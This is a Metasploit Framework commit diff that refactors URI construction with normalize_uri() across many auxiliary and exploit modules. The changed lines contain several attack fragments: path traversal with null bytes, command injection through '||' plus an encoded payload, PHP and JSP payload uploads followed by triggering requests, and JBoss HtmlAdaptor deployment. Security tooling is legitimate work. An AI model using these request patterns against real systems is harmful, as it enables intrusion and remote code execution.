mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Correctly use normalize_uri()
normalize_uri() should be used when you're joining URIs. Because if you're merging URIs after it's normalized, you could get double slashes again.
This commit is contained in:
parent
d8b15daaf2
commit
c174e6a208
@ -96,7 +96,9 @@ class Metasploit4 < Msf::Auxiliary
|
||||
juhash = Digest::MD5.hexdigest(juarray)
|
||||
juhash = juhash[0..9] # shortMD5 value for use as juhash
|
||||
|
||||
file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
|
||||
uri_base_path = normalize_uri(uri, '/index.php')
|
||||
|
||||
file_uri = "#{uri_base_path}?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
|
||||
vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
|
||||
|
||||
begin
|
||||
|
@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
print_status("Establishing a connection to the target...")
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
|
||||
uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
|
||||
rpath = uri + "?days=1&offset=0&sort_mode="
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => rpath,
|
||||
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
begin
|
||||
o = {
|
||||
'uri' => normalize_uri(datastore['URI']) || '/',
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'headers' => {
|
||||
'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
|
||||
}
|
||||
|
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
key="w3tc_#{host}_#{site_id}_sql_#{query_md5}"
|
||||
key_md5 = ::Rex::Text.md5(key)
|
||||
hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}"
|
||||
url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache")
|
||||
url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache")
|
||||
uri << hash_path
|
||||
|
||||
result = nil
|
||||
|
@ -49,8 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1,1] != '/'
|
||||
base = target_uri.path
|
||||
|
||||
peer = "#{ip}:#{rport}"
|
||||
fname = datastore['FILE']
|
||||
@ -61,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'encode_params' => false,
|
||||
'uri' => "#{base}gmap/view_overlay.php",
|
||||
'uri' => normalize_uri(base, "gmap/view_overlay.php"),
|
||||
'vars_get' => {
|
||||
'overlay_type' => "#{traverse}#{fname}%00"
|
||||
}
|
||||
|
@ -46,7 +46,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run_host(ip)
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
peer = "#{ip}:#{rport}"
|
||||
|
||||
@ -58,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}index.php",
|
||||
'uri' => normalize_uri(base, "index.php"),
|
||||
'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
|
||||
})
|
||||
|
||||
|
@ -44,10 +44,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run_host(rhost)
|
||||
url = normalize_uri(datastore['URI'])
|
||||
url = normalize_uri(datastore['URI'], '/index.php/members')
|
||||
|
||||
begin
|
||||
res = send_request_raw({'uri' => "#{url}/index.php/members"})
|
||||
res = send_request_raw({'uri' => url})
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("#{peer} Unable to connect to #{url}")
|
||||
|
@ -60,8 +60,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
|
||||
|
||||
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{@uri}services/APISiteScopeImpl",
|
||||
'uri' => uri,
|
||||
'method' => 'GET'})
|
||||
|
||||
if not res
|
||||
@ -91,8 +93,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
print_status("#{@peer} - Retrieving the SiteScope Configuration")
|
||||
|
||||
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{@uri}services/APISiteScopeImpl",
|
||||
'uri' => uri,
|
||||
'method' => 'POST',
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'data' => data,
|
||||
|
@ -59,8 +59,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
|
||||
|
||||
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{@uri}services/APIMonitorImpl",
|
||||
'uri' => uri,
|
||||
'method' => 'GET'})
|
||||
|
||||
if not res
|
||||
@ -95,8 +97,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
print_status("#{@peer} - Retrieving the file contents")
|
||||
|
||||
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{@uri}services/APIMonitorImpl",
|
||||
'uri' => uri,
|
||||
'method' => 'POST',
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'data' => data,
|
||||
|
@ -81,7 +81,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => path,
|
||||
'uri' => normalize_uri(path),
|
||||
'method' => 'PUT',
|
||||
'ctype' => 'text/plain',
|
||||
'data' => data,
|
||||
@ -102,7 +102,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => path,
|
||||
'uri' => normalize_uri(path),
|
||||
'method' => 'DELETE',
|
||||
'ctype' => 'text/html',
|
||||
}, 20
|
||||
@ -119,7 +119,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
# Main function for the module, duh!
|
||||
#
|
||||
def run_host(ip)
|
||||
path = normalize_uri(datastore['PATH'])
|
||||
path = datastore['PATH']
|
||||
data = datastore['FILEDATA']
|
||||
|
||||
if path[-1,1] != '/'
|
||||
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri = target_uri.path
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
|
||||
t = "/.." * datastore['DEPTH']
|
||||
@ -52,9 +52,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Retrieving #{datastore['FILE']}")
|
||||
|
||||
# No permission to access.log or proc/self/environ, so this is all we do :-/
|
||||
uri = normalize_uri(uri, 'index.php')
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}index.php/?p=#{t}#{datastore['FILE']}%00"
|
||||
'uri' => "#{uri}/?p=#{t}#{datastore['FILE']}%00"
|
||||
})
|
||||
|
||||
if not res
|
||||
|
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + "/services/Session",
|
||||
'uri' => normalize_uri(datastore['URI'], "/services/Session"),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run_host(ip)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']) + "/services/listServices",
|
||||
'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
return if not res
|
||||
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run_host(ip)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']) + "/services/listServices",
|
||||
'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
return if not res or res.code != 200
|
||||
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9084),
|
||||
OptString.new('URIPATH', [true, 'URI path to the downloads/', '/vci/downloads/']),
|
||||
OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
|
||||
OptString.new('FILE', [true, 'Define the remote file to download', 'boot.ini'])
|
||||
], self.class)
|
||||
end
|
||||
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run_host(ip)
|
||||
fname = File.basename(datastore['FILE'])
|
||||
traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
|
||||
uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE']
|
||||
uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
|
||||
|
||||
print_status("#{rhost}:#{rport} - Requesting: #{uri}")
|
||||
|
||||
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
@uri = normalize_uri(target_uri)
|
||||
@uri = target_uri
|
||||
@uri.path << "/" if @uri.path[-1, 1] != "/"
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Sending malicious request...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => @uri.path + "admin/tools/export.php",
|
||||
'uri' => normalize_uri(@uri.path, "admin/tools/export.php"),
|
||||
'cookie' => sid,
|
||||
'vars_post' => {
|
||||
'token' => token,
|
||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri = target_uri.path
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Sending Command injection")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}spywall/ipchange.php",
|
||||
'uri' => normalize_uri(uri, 'spywall/ipchange.php'),
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
|
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri = target_uri.path
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Sending PHP payload (#{payload_name})")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}spywall/blocked_file.php",
|
||||
'uri' => normalize_uri(uri, "spywall/blocked_file.php"),
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'data' => post_data.to_s
|
||||
})
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
base = normalize_uri(target_uri.path)
|
||||
base = target_uri.path
|
||||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
@payload_name = "#{rand_text_alpha(5)}.php"
|
||||
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
print_status("#{peer} Uploading payload: #{@payload_name}")
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{base}includes/inline_image_upload.php",
|
||||
'uri' => normalize_uri(base, 'includes/inline_image_upload.php'),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'multipart/form-data; boundary=----x',
|
||||
'data' => post_data
|
||||
|
@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
uri = target_uri.path
|
||||
|
||||
print_status("#{peer} - Housing php payload...")
|
||||
|
||||
@ -86,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
post_data << "\n"*2
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}install/index.php",
|
||||
'uri' => normalize_uri(uri, 'install/index.php'),
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
@ -95,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Execute our payload
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}includes/settings.php",
|
||||
'uri' => normalize_uri(uri, 'includes/settings.php'),
|
||||
'headers' => {
|
||||
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
||||
}
|
||||
|
@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri = target_uri.path
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri + "docs/changes.txt"
|
||||
'uri' => normalize_uri(uri, "docs/changes.txt")
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/
|
||||
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri = target_uri.path
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Injecting the PHP payload")
|
||||
|
||||
response = send_request_cgi({
|
||||
'uri' => uri + "converter.php",
|
||||
'uri' => normalize_uri(uri, "converter.php"),
|
||||
'method' => "POST",
|
||||
'vars_post' => {
|
||||
"action" => "convert",
|
||||
@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
timeout = 0.01
|
||||
response = send_request_cgi({
|
||||
'uri' => uri + "includes/currencies.php",
|
||||
'uri' => normalize_uri(uri, "includes/currencies.php"),
|
||||
'method' => "GET",
|
||||
'headers' => {
|
||||
'Connection' => "close",
|
||||
|
@ -57,13 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri = target_uri.path
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
|
||||
'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),
|
||||
'vars_get' => {
|
||||
'destServer' => "||echo #{clue}"
|
||||
}
|
||||
@ -79,13 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri = target_uri.path
|
||||
|
||||
# Trigger the command execution bug
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
|
||||
'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),
|
||||
'vars_get' =>
|
||||
{
|
||||
'destServer' => "||#{payload.encoded}"
|
||||
|
@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri = target_uri.path
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}addons/uploadify/uploadify.php"
|
||||
'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body.empty?
|
||||
@ -75,8 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri = target_uri.path
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
|
||||
@ -91,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Sending PHP payload (#{payload_name})")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}addons/uploadify/uploadify.php",
|
||||
'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"),
|
||||
'ctype' => 'multipart/form-data; boundary=o0oOo0o',
|
||||
'data' => post_data
|
||||
})
|
||||
@ -107,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Execute our payload
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}addons/uploadify/uploads/#{payload_name}"
|
||||
'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")
|
||||
})
|
||||
|
||||
# If we don't get a 200 when we request our malicious payload, we suspect
|
||||
|
@ -56,11 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri = target_uri.path
|
||||
base = File.dirname("#{uri}.")
|
||||
|
||||
res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"})
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
|
||||
})
|
||||
if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
@ -83,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{base}/admin/sitebanners/upload_banners.php",
|
||||
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data,
|
||||
})
|
||||
@ -94,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
print_status("#{@peer} - Requesting '#{php_fname}'...")
|
||||
res = send_request_raw({'uri'=>"#{base}/banners/#{php_fname}"})
|
||||
res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
|
||||
if res and res.code == 404
|
||||
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
|
||||
return
|
||||
|
@ -267,7 +267,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => "#{rpath}/axis2-admin/login",
|
||||
'uri' => normalize_uri(rpath, '/axis2-admin/login'),
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
|
||||
}, 25)
|
||||
@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => "#{rpath}/axis2-admin/login",
|
||||
'uri' => normalize_uri(rpath, '/axis2-admin/login'),
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
|
||||
}, 25)
|
||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}"
|
||||
'uri' => base
|
||||
})
|
||||
|
||||
if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/
|
||||
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# upload
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{base}pages/restart_circulation_values_write.php",
|
||||
'uri' => normalize_uri(base, "pages/restart_circulation_values_write.php"),
|
||||
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||
'data' => data_post,
|
||||
})
|
||||
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{@peer} - Retrieving file: #{fname}")
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}upload/___1/#{fname}"
|
||||
'uri' => normalize_uri(base, "upload/___1/#{fname}")
|
||||
})
|
||||
|
||||
handler
|
||||
|
@ -59,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
# Make sure the URI begins with a slash
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = datastore['URI']
|
||||
|
||||
function = "passthru"
|
||||
key = Rex::Text.rand_text_alpha(6)
|
||||
arguments = "echo #{key}`"+payload.raw+"`#{key}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => uri + "/services/javascript.php",
|
||||
'uri' => normalize_uri(uri, "/services/javascript.php"),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'data' => "app="+datastore['APP']+"&file=open_calendar.js",
|
||||
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Generate an initial JSESSIONID
|
||||
print_status("#{@peer} - Retrieving an initial JSESSIONID")
|
||||
res = send_request_cgi(
|
||||
'uri' => "#{@uri}servlet/Main",
|
||||
'uri' => normalize_uri(@uri, 'servlet/Main'),
|
||||
'method' => 'POST'
|
||||
)
|
||||
|
||||
@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "#{@uri}j_security_check",
|
||||
'uri' => normalize_uri(@uri, 'j_security_check'),
|
||||
'method' => 'POST',
|
||||
'data' => login_data,
|
||||
'ctype' => "application/x-www-form-urlencoded",
|
||||
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{@peer} - Uploading the JSP")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
|
||||
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
|
||||
'method' => 'POST',
|
||||
'data' => post_data.to_s,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => "#{@uri}#{@jsp_name}.jsp",
|
||||
'uri' => normalize_uri(@uri, "#{@jsp_name}.jsp"),
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
data << "</wsns0:Envelope>" + "\r\n"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{@uri}services/APIPreferenceImpl",
|
||||
'uri' => normalize_uri(@uri, 'services/APIPreferenceImpl'),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'data' => data,
|
||||
|
@ -391,7 +391,7 @@ EOT
|
||||
end
|
||||
|
||||
def query_serverinfo
|
||||
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => path,
|
||||
@ -449,13 +449,13 @@ EOT
|
||||
if (datastore['VERB']== "POST")
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
|
||||
'data' => params
|
||||
})
|
||||
else
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{params}"
|
||||
}, 30)
|
||||
end
|
||||
res
|
||||
|
@ -277,14 +277,14 @@ EOT
|
||||
if (datastore['VERB'] == "POST")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
|
||||
'method' => datastore['VERB'],
|
||||
'data' => data
|
||||
}, 5)
|
||||
else
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data,
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}",
|
||||
'method' => datastore['VERB'],
|
||||
}, 30)
|
||||
end
|
||||
@ -308,14 +308,14 @@ EOT
|
||||
if (datastore['VERB'] == "POST")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
|
||||
'method' => datastore['VERB'],
|
||||
'data' => data
|
||||
}, 5)
|
||||
else
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data,
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}",
|
||||
'method' => datastore['VERB'],
|
||||
}, 30)
|
||||
end
|
||||
@ -378,7 +378,7 @@ EOT
|
||||
|
||||
|
||||
def query_serverinfo
|
||||
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => path,
|
||||
|
@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
if (datastore['VERB'] == "POST")
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
|
||||
'vars_post' =>
|
||||
{
|
||||
'action' => 'invokeOpByName',
|
||||
@ -189,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
else
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
|
||||
'vars_get' =>
|
||||
{
|
||||
'action' => 'invokeOpByName',
|
||||
@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Undeploying #{app_base} ...")
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
|
||||
'vars_post' =>
|
||||
{
|
||||
'action' => 'invokeOpByName',
|
||||
@ -314,7 +314,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
|
||||
def query_serverinfo
|
||||
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => path
|
||||
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
